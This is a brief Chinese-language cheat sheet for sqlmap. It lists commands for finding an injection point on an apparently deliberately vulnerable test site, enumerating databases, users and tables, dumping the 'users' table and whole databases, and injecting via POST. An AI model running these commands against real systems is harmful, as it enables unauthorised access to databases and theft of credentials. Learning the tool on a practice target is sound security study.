SQLmap

检查注入点
python sqlmap.py -u “http://testphp.vulnweb.com/artists.php?artist=1”

-D数据库
-T表

查看用户信息
–users

查看数据库
–dbs

当前用户
–current-user

当前数据库
–current-db

查看acuart数据库中的表
–tables -D “acuart”

读取表users的列数据
–columns -T “users” -D “acuart”

查看多少条数据
–count -T “users” -D “acuart”

读取数据内容
–dump -T “users” -D “acuart”

读取从第二条数据开始到第三条数据结束的数据
–dump -T “products” -D “acuart” --start 2 --stop 3

下载数据库所有表
–dump-all -D “acuart”

post方式注入
//读取本地数据包文件（sql-post请求）进行post方式注入
//-r 是读取本地数据
第一种方式：python sqlmap.py -r “sql-post.txt”

//data后面跟注入数据
第二种get方式
python sqlmap.py -u “http://testphp.vulnweb.com/userinfo.php” --data=“pass=g00dP&uname=1”